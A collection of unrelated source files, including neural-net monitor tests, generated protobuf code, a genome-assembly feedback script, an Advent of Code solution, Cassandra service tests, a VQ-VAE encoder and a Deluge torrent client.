assert len(monitor.values) == 2
assert round(monitor.values[2], 2) == 0.7
def test_add_modulator_monitor(fixed_nodenet):
uid = micropsi.add_modulator_monitor(fixed_nodenet, 'base_test', 'Testmonitor', color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'Testmonitor'
assert monitor.modulator == 'base_test'
assert monitor.color == "#112233"
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.values[1] == 1
micropsi.nodenets[fixed_nodenet].set_modulator('base_test', 0.7)
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 2
assert monitor.values[2] == 0.7
def test_add_custom_monitor(fixed_nodenet):
code = """return len(netapi.get_nodes())"""
uid = micropsi.add_custom_monitor(fixed_nodenet, code, 'Nodecount', color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'Nodecount'
assert monitor.compiled_function is not None
assert monitor.function == code
assert monitor.color == "#112233"
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 1
assert monitor.values[1] == len(micropsi.nodenets[fixed_nodenet].netapi.get_nodes())
def test_remove_monitor(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
assert micropsi.nodenets[fixed_nodenet].get_monitor(uid) is not None
micropsi.remove_monitor(fixed_nodenet, uid)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor is None
def test_remove_monitored_node(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', sheaf='default')
micropsi.delete_nodes(fixed_nodenet, ['n0001'])
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.export_monitor_data(fixed_nodenet)
assert monitor[uid]['values'][1] is None
def test_remove_monitored_link(fixed_nodenet):
uid = micropsi.add_link_monitor(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen', 'weight', 'Testmonitor')
micropsi.delete_link(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen')
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.export_monitor_data(fixed_nodenet)
assert monitor[uid]['values'][1] is None
def test_remove_monitored_link_via_delete_node(fixed_nodenet):
uid = micropsi.add_link_monitor(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen', 'weight', 'Testmonitor')
micropsi.delete_nodes(fixed_nodenet, ['n0005'])
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.export_monitor_data(fixed_nodenet)
assert monitor[uid]['values'][1] is None
def test_get_monitor_data(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', name="Testmonitor")
micropsi.step_nodenet(fixed_nodenet)
data = micropsi.get_monitor_data(fixed_nodenet)
assert data['current_step'] == 1
assert data['monitors'][uid]['name'] == 'Testmonitor'
values = data['monitors'][uid]['values']
assert len(values.keys()) == 1
assert [k for k in values.keys()] == [1]
def test_export_monitor_data(fixed_nodenet):
uid1 = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
uid2 = micropsi.add_gate_monitor(fixed_nodenet, 'n0003', 'gen')
micropsi.step_nodenet(fixed_nodenet)
data = micropsi.export_monitor_data(fixed_nodenet)
assert uid1 in data
assert 'values' in data[uid1]
assert uid2 in data
def test_export_monitor_data_with_id(fixed_nodenet):
uid1 = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', name="Testmonitor")
micropsi.add_gate_monitor(fixed_nodenet, 'n0003', 'gen')
micropsi.step_nodenet(fixed_nodenet)
data = micropsi.export_monitor_data(fixed_nodenet, monitor_uid=uid1)
assert data['name'] == 'Testmonitor'
assert 'values' in data
def test_clear_monitor(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
micropsi.step_nodenet(fixed_nodenet)
micropsi.clear_monitor(fixed_nodenet, uid)
data = micropsi.get_monitor_data(fixed_nodenet)
values = data['monitors'][uid]['values']
assert len(values.keys()) == 0
def test_fetch_partial_monitor_data(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
i = 0
while i < 50:
micropsi.step_nodenet(fixed_nodenet)
i += 1
assert micropsi.nodenets[fixed_nodenet].current_step == 50
# get 10 items from [20 - 29]
data = micropsi.export_monitor_data(fixed_nodenet, monitor_from=20, monitor_count=10)
values = data[uid]['values']
assert len(values.keys()) == 10
assert set(list(values.keys())) == set(range(20, 30))
# get 10 items from [20 - 29] for one monitor
data = micropsi.export_monitor_data(fixed_nodenet, monitor_uid=uid, monitor_from=20, monitor_count=10)
values = data['values']
assert len(values.keys()) == 10
assert set(list(values.keys())) == set(range(20, 30))
# get 10 newest values [41-50]
data = micropsi.export_monitor_data(fixed_nodenet, monitor_count=10)
values = data[uid]['values']
assert len(values.keys()) == 10
assert set(list(values.keys())) == set(range(41, 51))
# get 10 items, starting at 45 -- assert they are filled up to the left.
data = micropsi.export_monitor_data(fixed_nodenet, monitor_from=40, monitor_count=15)
values = data[uid]['values']
assert len(values.keys()) == 15
assert set(list(values.keys())) == set(range(36, 51))
# get all items, starting at 10
data = micropsi.export_monitor_data(fixed_nodenet, monitor_from=10)
values = data[uid]['values']
assert len(values.keys()) == 41
assert set(list(values.keys())) == set(range(10, 51))
|
pgoapi/protos/POGOProtos/Data/Gym_pb2.py | neoz/pgoapi | 1,457 | 11086895 | <gh_stars>1000+
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos.Data.Gym.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos import Data_pb2 as POGOProtos_dot_Data__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Enums__pb2
POGOProtos_dot_Data_dot_Player__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Data_dot_Player__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Enums__pb2
POGOProtos_dot_Inventory_dot_Item__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Inventory_dot_Item__pb2
from POGOProtos.Data import Player_pb2 as POGOProtos_dot_Data_dot_Player__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Data_dot_Player__pb2.POGOProtos_dot_Enums__pb2
from POGOProtos.Map import Fort_pb2 as POGOProtos_dot_Map_dot_Fort__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Map_dot_Fort__pb2.POGOProtos_dot_Enums__pb2
POGOProtos_dot_Inventory_dot_Item__pb2 = POGOProtos_dot_Map_dot_Fort__pb2.POGOProtos_dot_Inventory_dot_Item__pb2
from POGOProtos.Data_pb2 import *
from POGOProtos.Data.Player_pb2 import *
from POGOProtos.Map.Fort_pb2 import *
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos.Data.Gym.proto',
package='POGOProtos.Data.Gym',
syntax='proto3',
serialized_pb=_b('\n\x19POGOProtos.Data.Gym.proto\x12\x13POGOProtos.Data.Gym\x1a\x15POGOProtos.Data.proto\x1a\x1cPOGOProtos.Data.Player.proto\x1a\x19POGOProtos.Map.Fort.proto\"\x90\x01\n\rGymMembership\x12\x32\n\x0cpokemon_data\x18\x01 \x01(\x0b\x32\x1c.POGOProtos.Data.PokemonData\x12K\n\x16trainer_public_profile\x18\x02 \x01(\x0b\x32+.POGOProtos.Data.Player.PlayerPublicProfile\"u\n\x08GymState\x12\x30\n\tfort_data\x18\x01 \x01(\x0b\x32\x1d.POGOProtos.Map.Fort.FortData\x12\x37\n\x0bmemberships\x18\x02 \x03(\x0b\x32\".POGOProtos.Data.Gym.GymMembershipP\x00P\x01P\x02\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Data__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Player__pb2.DESCRIPTOR,POGOProtos_dot_Map_dot_Fort__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_GYMMEMBERSHIP = _descriptor.Descriptor(
name='GymMembership',
full_name='POGOProtos.Data.Gym.GymMembership',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='pokemon_data', full_name='POGOProtos.Data.Gym.GymMembership.pokemon_data', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='trainer_public_profile', full_name='POGOProtos.Data.Gym.GymMembership.trainer_public_profile', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=131,
serialized_end=275,
)
_GYMSTATE = _descriptor.Descriptor(
name='GymState',
full_name='POGOProtos.Data.Gym.GymState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='fort_data', full_name='POGOProtos.Data.Gym.GymState.fort_data', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='memberships', full_name='POGOProtos.Data.Gym.GymState.memberships', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=394,
)
_GYMMEMBERSHIP.fields_by_name['pokemon_data'].message_type = POGOProtos_dot_Data__pb2._POKEMONDATA
_GYMMEMBERSHIP.fields_by_name['trainer_public_profile'].message_type = POGOProtos_dot_Data_dot_Player__pb2._PLAYERPUBLICPROFILE
_GYMSTATE.fields_by_name['fort_data'].message_type = POGOProtos_dot_Map_dot_Fort__pb2._FORTDATA
_GYMSTATE.fields_by_name['memberships'].message_type = _GYMMEMBERSHIP
DESCRIPTOR.message_types_by_name['GymMembership'] = _GYMMEMBERSHIP
DESCRIPTOR.message_types_by_name['GymState'] = _GYMSTATE
GymMembership = _reflection.GeneratedProtocolMessageType('GymMembership', (_message.Message,), dict(
DESCRIPTOR = _GYMMEMBERSHIP,
__module__ = 'POGOProtos.Data.Gym_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Gym.GymMembership)
))
_sym_db.RegisterMessage(GymMembership)
GymState = _reflection.GeneratedProtocolMessageType('GymState', (_message.Message,), dict(
DESCRIPTOR = _GYMSTATE,
__module__ = 'POGOProtos.Data.Gym_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Gym.GymState)
))
_sym_db.RegisterMessage(GymState)
# @@protoc_insertion_point(module_scope)
|
scripts/GenerateFeedback.py | AustinHartman/shasta | 267 | 11086909 | #!/usr/bin/python3
import configparser
import sys
import getopt
import json
import csv
helpMessage = """
Usage:
GenerateFeedback.py --assemblyDirectory /path/to/assemblyDirectory
Note: The goal of this script is to provide feedback on a de novo assembly done using the
Shasta long read assembler.
Each genome is different and reads differ in quality. So it is likely that you will need
to repeat the `assembly -> feedback -> assembly` process a few times.
If you're not happy with the assembly after a few (3-4) tries, please file a Github issue
and we can help.
"""
def usage():
print(helpMessage)
return
def loadAssemblySummary(assemblyDirPath):
assemblySummary = {}
assemblySummaryFile = '{}/AssemblySummary.json'.format(assemblyDirPath)
with open(assemblySummaryFile) as jsonFile:
assemblySummary = json.load(jsonFile)
return assemblySummary
def analyze(assemblyDirPath, genomeSize):
assemblySummary = loadAssemblySummary(assemblyDirPath)
readsUsedInAssembly = assemblySummary['Reads used in this assembly']
numberOfReads = readsUsedInAssembly['Number of reads']
readGraph = assemblySummary['Read graph']
isolatedReadsFraction = float(readGraph['Isolated reads fraction']['Reads'])
alignments = assemblySummary['Alignments']
numberOfAlignmentCandidates = alignments['Number of alignment candidates found by the LowHash algorithm']
numberOfGoodAlignments = alignments['Number of good alignments']
assembledSegments = assemblySummary['Assembled segments']
totalAssembledLength = assembledSegments['Total assembled segment length']
longestSegmentLength = assembledSegments['Longest assembled segment length']
segmentsN50 = assembledSegments['Assembled segments N50']
print()
print('Number of reads used = {}'.format(numberOfReads))
print('Isolated reads fraction = {:.2f}'.format(isolatedReadsFraction))
print('Number of alignment candidates = {}'.format(numberOfAlignmentCandidates))
print('Number of good alignments = {}'.format(numberOfGoodAlignments))
print()
print('Genome fraction assembled = {:.2f} %'.format(totalAssembledLength * 100 / genomeSize))
print('Longest assembled segment length = {}'.format(longestSegmentLength))
print('Assembled segments N50 = {}'.format(segmentsN50))
print()
avgCandidatesPerRead = numberOfAlignmentCandidates / numberOfReads
config = getConfig(assemblyDirPath)
minHashConfig = config['MinHash']
print('Feedback, if any:')
if (avgCandidatesPerRead < 20):
print('MinHash phase did not generate enough alignment candidates.')
print('Try the following in order:')
print(' (Suggestion) Increase `MinHash.minHashIterationCount` by 10, up to a maximum of 100.')
if (int(minHashConfig['m']) == 4):
print(' (Suggestion) Decrease `MinHash.m` to 3.')
else:
# Enough promising candidate pairs were generated
avgGoodAlignmentsPerRead = numberOfGoodAlignments / numberOfReads
if (avgGoodAlignmentsPerRead < 5 or isolatedReadsFraction > 0.5):
# ... but not enough candidates met the bar of what is considered a good alignment.
msg = (
'Not enough good alignments were generated per read. '
'Try relaxing the definition of what makes a good alignment.'
)
print(msg)
print('Try the following in order:')
print(' (Suggestion) Decrease `Align.minAlignedFraction` by 0.05, up to a minimum of 0.2.')
print(' (Suggestion) Decrease `Align.minAlignedMarkerCount` by 20, up to a minimum of 200.')
print(' (Suggestion) Increase `Align.maxSkip` & `Align.maxDrift` by 10, to allow for larger gaps in alignments.')
def getConfig(assemblyDirPath):
config = configparser.ConfigParser()
configFilePath = '{}/shasta.conf'.format(assemblyDirPath)
if not config.read(configFilePath):
raise Exception('Error reading config file {}.'.format(configFilePath))
return config
def main(argv):
assemblyDirPath = ""
try:
opts, args = getopt.getopt(argv,"", ["assemblyDirectory="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("--assemblyDirectory"):
assemblyDirPath = arg
if assemblyDirPath == "":
usage()
exit(2)
print()
genomeSizeMessage = """
What is the approximate genome size in megabases (Mbp)?
Examples:
3000 (for a 3 Gbp genome)
0.4 (for a 400 Kbp genome)
"""
print(genomeSizeMessage)
genomeSize = float(input('Approximate genome size in megabasis (Mbp): '))
genomeSize = int(genomeSize * 1000 * 1000)
analyze(assemblyDirPath, genomeSize)
print()
return
if __name__ == '__main__':
main(sys.argv[1:])
|
2021/day_19.py | salt-die/Advent-of-Code | 105 | 11086923 | from itertools import product
import cv2
import numpy as np
import aoc_helper
from aoc_helper.utils import extract_ints
class Scanner:
def __init__(self, coords):
self.coords = coords
self.distances = np.array(
list(map(set, np.linalg.norm(coords[:, None] - coords[None], axis=-1)))
)
def parse_raw():
raw = aoc_helper.day(19).split("\n\n")
scanners = [ ]
for scanner in raw:
_, data = scanner.split("\n", 1)
scanners.append(
Scanner(
np.fromiter(extract_ints(data), dtype=int).reshape(-1, 3)
)
)
return scanners
SCANNERS = parse_raw()
def coalesce(a, b):
js, ks = [ ], [ ]
for (j, p), (k, q) in product(
enumerate(a.distances),
enumerate(b.distances),
):
if len(p & q) >= 12:
js.append(j)
ks.append(k)
if len(js) == 4:
break
else:
return False
M = cv2.estimateAffine3D(b.coords[ks], a.coords[js])[1].round().astype(int)
orientation, translation = M[:, :3], M[:, 3]
transformed = b.coords @ orientation.T + translation
check = (a.coords[:, None] == transformed[None]).all(-1)
where_a_equal_b, where_b_equal_a = np.where(check)
b_not_equal_a_mask = ~check.any(0)
a.distances[where_a_equal_b] |= b.distances[where_b_equal_a]
a.distances = np.concatenate((a.distances, b.distances[b_not_equal_a_mask]))
a.coords = np.concatenate((a.coords, transformed[b_not_equal_a_mask]))
a.scanners.append(translation)
return True
def coalesce_all():
origin = SCANNERS[0]
origin.scanners = [np.zeros(3, dtype=int)]
unpaired = SCANNERS[1:]
while unpaired:
unpaired = [
scanner
for scanner in unpaired
if not coalesce(origin, scanner)
]
return origin
ORIGIN = coalesce_all()
def part_one():
return len(ORIGIN.coords)
def part_two():
scanners = np.array(ORIGIN.scanners)
return np.abs(scanners[:, None] - scanners[None]).sum(axis=-1).max()
aoc_helper.submit(19, part_one)
aoc_helper.submit(19, part_two)
|
frameworks/cassandra/tests/test_sanity.py | iss-lab/dcos-commons | 201 | 11086937 | import pytest
import logging
from typing import Any, Dict, Iterator, List
import sdk_cmd
import sdk_hosts
import sdk_install
import sdk_jobs
import sdk_metrics
import sdk_networks
import sdk_plan
import sdk_service
import sdk_tasks
import sdk_upgrade
from tests import config
log = logging.getLogger(__name__)
@pytest.fixture(scope="module", autouse=True)
def configure_package(configure_security: None) -> Iterator[None]:
test_jobs: List[Dict[str, Any]] = []
try:
test_jobs = config.get_all_jobs(node_address=config.get_foldered_node_address())
# destroy/reinstall any prior leftover jobs, so that they don't touch the newly installed service:
for job in test_jobs:
sdk_jobs.install_job(job)
sdk_install.uninstall(config.PACKAGE_NAME, config.get_foldered_service_name())
sdk_upgrade.test_upgrade(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
config.DEFAULT_TASK_COUNT,
from_options={"service": {"name": config.get_foldered_service_name()}},
)
yield # let the test session execute
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.get_foldered_service_name())
for job in test_jobs:
sdk_jobs.remove_job(job)
@pytest.mark.sanity
def test_endpoints() -> None:
# check that we can reach the scheduler via admin router, and that returned endpoints are sanitized:
endpoints = sdk_networks.get_endpoint(
config.PACKAGE_NAME, config.get_foldered_service_name(), "native-client"
)
assert endpoints["dns"][0] == sdk_hosts.autoip_host(
config.get_foldered_service_name(), "node-0-server", 9042
)
assert "vip" not in endpoints
@pytest.mark.sanity
@pytest.mark.smoke
def test_repair_cleanup_plans_complete() -> None:
parameters = {"CASSANDRA_KEYSPACE": "testspace1"}
# populate 'testspace1' for test, then delete afterwards:
with sdk_jobs.RunJobContext(
before_jobs=[
config.get_write_data_job(node_address=config.get_foldered_node_address()),
config.get_verify_data_job(node_address=config.get_foldered_node_address()),
],
after_jobs=[
config.get_delete_data_job(node_address=config.get_foldered_node_address()),
config.get_verify_deletion_job(node_address=config.get_foldered_node_address()),
],
):
sdk_plan.start_plan(config.get_foldered_service_name(), "cleanup", parameters=parameters)
sdk_plan.wait_for_completed_plan(config.get_foldered_service_name(), "cleanup")
sdk_plan.start_plan(config.get_foldered_service_name(), "repair", parameters=parameters)
sdk_plan.wait_for_completed_plan(config.get_foldered_service_name(), "repair")
@pytest.mark.sanity
@pytest.mark.dcos_min_version("1.9")
def test_metrics() -> None:
expected_metrics = [
"org.apache.cassandra.metrics.Table.CoordinatorReadLatency.system.hints.p999",
"org.apache.cassandra.metrics.Table.CompressionRatio.system_schema.indexes",
"org.apache.cassandra.metrics.ThreadPools.ActiveTasks.internal.MemtableReclaimMemory",
]
def expected_metrics_exist(emitted_metrics: List[str]) -> bool:
return sdk_metrics.check_metrics_presence(
emitted_metrics=emitted_metrics, expected_metrics=expected_metrics
)
sdk_metrics.wait_for_service_metrics(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
"node-0",
"node-0-server",
config.DEFAULT_CASSANDRA_TIMEOUT,
expected_metrics_exist,
)
@pytest.mark.sanity
def test_custom_jmx_port() -> None:
expected_open_port = ":7200"
new_config = {"cassandra": {"jmx_port": 7200}}
sdk_service.update_configuration(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
new_config,
config.DEFAULT_TASK_COUNT,
)
sdk_plan.wait_for_completed_deployment(config.get_foldered_service_name())
tasks = sdk_tasks.get_service_tasks(config.get_foldered_service_name(), "node")
for task in tasks:
_, stdout, _ = sdk_cmd.run_cli("task exec {} netstat -nlp | grep :7200".format(task.id))
assert expected_open_port in stdout
@pytest.mark.sanity
def test_udf() -> None:
test_jobs: List[Dict[str, Any]] = []
try:
test_jobs = config.get_udf_jobs(node_address=config.get_foldered_node_address())
# destroy/reinstall any prior leftover jobs, so that they don't touch the newly installed service:
for job in test_jobs:
sdk_jobs.install_job(job)
new_config = {
"cassandra": {
"enable_user_defined_functions": True,
"enable_scripted_user_defined_functions": True,
}
}
sdk_service.update_configuration(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
new_config,
config.DEFAULT_TASK_COUNT,
)
config.verify_client_can_write_read_udf(config.get_foldered_node_address())
finally:
# remove job definitions from metronome
for job in test_jobs:
sdk_jobs.remove_job(job)
|
src/models/convolutional_encoder.py | roberthoenig/VQ-VAE-Speech | 241 | 11086950 | <gh_stars>100-1000
#####################################################################################
# MIT License #
# #
# Copyright (C) 2019 <NAME> #
# #
# This file is part of VQ-VAE-Speech. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#####################################################################################
from modules.residual_stack import ResidualStack
from modules.conv1d_builder import Conv1DBuilder
from error_handling.console_logger import ConsoleLogger
import torch
import torch.nn as nn
import torch.nn.functional as F
class ConvolutionalEncoder(nn.Module):
def __init__(self, in_channels, num_hiddens, num_residual_layers, num_residual_hiddens,
use_kaiming_normal, input_features_type, features_filters, sampling_rate,
device, verbose=False):
super(ConvolutionalEncoder, self).__init__()
"""
2 preprocessing convolution layers with filter length 3
and residual connections.
"""
self._conv_1 = Conv1DBuilder.build(
in_channels=features_filters,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
self._conv_2 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
"""
1 strided convolution length reduction layer with filter
length 4 and stride 2 (downsampling the signal by a factor
of two).
"""
self._conv_3 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=4,
stride=2, # timestep * 2
use_kaiming_normal=use_kaiming_normal,
padding=2
)
"""
2 convolutional layers with length 3 and
residual connections.
"""
self._conv_4 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
self._conv_5 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
"""
4 feedforward ReLu layers with residual connections.
"""
self._residual_stack = ResidualStack(
in_channels=num_hiddens,
num_hiddens=num_hiddens,
num_residual_layers=num_residual_layers,
num_residual_hiddens=num_residual_hiddens,
use_kaiming_normal=use_kaiming_normal
)
self._input_features_type = input_features_type
self._features_filters = features_filters
self._sampling_rate = sampling_rate
self._device = device
self._verbose = verbose
def forward(self, inputs):
if self._verbose:
ConsoleLogger.status('inputs size: {}'.format(inputs.size()))
x_conv_1 = F.relu(self._conv_1(inputs))
if self._verbose:
ConsoleLogger.status('x_conv_1 output size: {}'.format(x_conv_1.size()))
x = F.relu(self._conv_2(x_conv_1)) + x_conv_1
if self._verbose:
ConsoleLogger.status('_conv_2 output size: {}'.format(x.size()))
x_conv_3 = F.relu(self._conv_3(x))
if self._verbose:
ConsoleLogger.status('_conv_3 output size: {}'.format(x_conv_3.size()))
x_conv_4 = F.relu(self._conv_4(x_conv_3)) + x_conv_3
if self._verbose:
ConsoleLogger.status('_conv_4 output size: {}'.format(x_conv_4.size()))
x_conv_5 = F.relu(self._conv_5(x_conv_4)) + x_conv_4
if self._verbose:
ConsoleLogger.status('x_conv_5 output size: {}'.format(x_conv_5.size()))
x = self._residual_stack(x_conv_5) + x_conv_5
if self._verbose:
ConsoleLogger.status('_residual_stack output size: {}'.format(x.size()))
return x
|
tests/errors/semantic/blocking/CONST_ASSIGNED_ARGUMENT2.py | dina-fouad/pyccel | 206 | 11086955 | # pylint: disable=missing-function-docstring, missing-module-docstring/
#$ header function array_int32_1d_add_const(const int32[:], int32[:])
def array_int32_1d_add_const( x, y ):
x[:] += y
|
Bit Manipulation/next power of 2/python/nextpowOf2.py | iabhimanyu/Algorithms | 715 | 11086960 | def nextPowOf2(n):
p = 1
if (n and not(n & (n - 1))):
return n
while (p < n) :
p <<= 1
return p;
t = int(input())
for i in range(t):
n= int(input())
print("Next Power of 2 " + nextPowOf2(n))
|
core/downloaders/deluge.py | rikbarker/watcher | 194 | 11086996 | import logging
import json
import urllib2
import zlib
from lib.deluge_client import DelugeRPCClient
import core
from core.helpers import Torrent, Url
logging = logging.getLogger(__name__)
class DelugeRPC(object):
@staticmethod
def test_connection(data):
''' Tests connectivity to deluge daemon rpc
data: dict of deluge server information
Tests if we can open a socket to the rpc
Return True on success or str error message on failure
'''
host = data['host']
port = int(data['port'])
user = data['user']
password = data['pass']
client = DelugeRPCClient(host, port, user, password)
try:
error = client.connect()
if error:
return u'{}.'.format(error)
except Exception, e:
return str(e)
return True
@staticmethod
def add_torrent(data):
''' Adds torrent or magnet to Deluge
data: dict of torrrent/magnet information
Returns dict {'response': True, 'download_id': 'id'}
{'response': False, 'error': 'exception'}
'''
conf = core.CONFIG['Downloader']['Torrent']['DelugeRPC']
host = conf['host']
port = conf['port']
user = conf['user']
password = conf['<PASSWORD>']
client = DelugeRPCClient(host, port, user, password)
try:
error = client.connect()
if error:
return {'response': False, 'error': error}
except Exception, e:
return {'response': False, 'error': str(e)[1:-1]}
try:
def_download_path = client.call('core.get_config')['download_location']
except Exception, e:
logging.error(u'Unable to get download path.', exc_info=True)
return {'response': False, 'error': 'Unable to get download path.'}
download_path = u'{}/{}'.format(def_download_path, conf['category'])
priority_keys = {
'Normal': 0,
'High': 128,
'Max': 255
}
options = {}
options['add_paused'] = conf['addpaused']
options['download_location'] = download_path
options['priority'] = priority_keys[conf['priority']]
if data['type'] == u'magnet':
try:
download_id = client.call('core.add_torrent_magnet', data['torrentfile'], options)
return {'response': True, 'downloadid': download_id}
except Exception, e:
logging.error(u'Unable to send magnet.', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
elif data['type'] == u'torrent':
try:
download_id = client.call('core.add_torrent_url', data['torrentfile'], options)
return {'response': True, 'downloadid': download_id}
except Exception, e:
logging.error(u'Unable to send magnet.', exc_info=True)
return {'response': False, 'error': str(e)[1:-1]}
return
class DelugeWeb(object):
cookie = None
retry = False
command_id = 0
headers = {'Content-Type': 'application/json', 'User-Agent': 'Watcher'}
@staticmethod
def test_connection(data):
''' Tests connectivity to deluge web client
data: dict of deluge server information
Return True on success or str error message on failure
'''
host = data['host']
port = data['port']
password = data['pass']
url = u'{}:{}/json'.format(host, port)
return DelugeWeb._login(url, password)
@staticmethod
def add_torrent(data):
''' Adds torrent or magnet to deluge web api
data: dict of torrrent/magnet information
Adds torrents to default/path/<category>
Returns dict {'response': True, 'download_id': 'id'}
{'response': False, 'error': 'exception'}
'''
conf = core.CONFIG['Downloader']['Torrent']['DelugeWeb']
host = conf['host']
port = conf['port']
url = u'{}:{}/json'.format(host, port)
priority_keys = {
'Normal': 0,
'High': 128,
'Max': 255
}
# check cookie validity while getting default download dir
download_dir = DelugeWeb._get_download_dir(url)
if not download_dir:
password = conf['pass']
if DelugeWeb._login(url, password) is not True:
return {'response': False, 'error': 'Incorrect usename or password.'}
download_dir = DelugeWeb._get_download_dir(url)
if not download_dir:
return {'response': False, 'error': 'Unable to get path information.'}
# if we got download_dir we can connect.
download_dir = u'{}/{}'.format(download_dir, conf['category'])
# if file is a torrent, have deluge download it to a tmp dir
if data['type'] == 'torrent':
tmp_torrent_file = DelugeWeb._get_torrent_file(data['torrentfile'], url)
if tmp_torrent_file['response'] is True:
data['torrentfile'] = tmp_torrent_file['torrentfile']
else:
return {'response': False, 'error': tmp_torrent_file['error']}
torrent = {'path': data['torrentfile'], 'options': {}}
torrent['options']['add_paused'] = conf['addpaused']
torrent['options']['download_location'] = download_dir
torrent['options']['priority'] = priority_keys[conf['priority']]
command = {'method': 'web.add_torrents',
'params': [[torrent]],
'id': DelugeWeb.command_id
}
DelugeWeb.command_id += 1
post_data = json.dumps(command)
